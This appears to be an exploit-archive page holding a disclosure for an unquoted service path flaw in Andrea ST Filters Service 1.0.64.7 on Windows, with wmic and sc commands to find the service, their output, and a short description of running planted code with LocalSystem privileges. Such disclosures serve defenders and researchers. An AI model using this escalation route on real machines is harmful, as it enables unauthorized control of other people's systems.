a99d181f24
8 changes to exploits/shellcodes Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) EmEditor 19.8 - Insecure File Permissions Druva inSync Windows Client 6.5.2 - Local Privilege Escalation Open-AudIT Professional 3.3.1 - Remote Code Execution School ERP Pro 1.0 - Arbitrary File Read Easy Transfer 1.7 for iOS - Directory Traversal hits script 1.0 - 'item_name' SQL Injection
34 lines
No EOL
1.7 KiB
Text
34 lines
No EOL
1.7 KiB
Text
# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
|
|
# Discovery by: Roberto Piña
|
|
# Discovery Date: 2020-04-28
|
|
# Vendor Homepage: https://andreaelectronics.com/
|
|
# Software Link : https://andreaelectronics.com/
|
|
# Tested Version: 1.0.64.7
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
|
|
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
|
|
|
|
C:\>sc qc AESTFilters
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: AESTFilters
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Andrea ST Filters Service
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
|
|
#Exploit:
|
|
# A successful attempt would require the local user to be able to insert their code in the system root path
|
|
# undetected by the OS or other security applications where it could potentially be executed during
|
|
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
|
# privileges of the application. |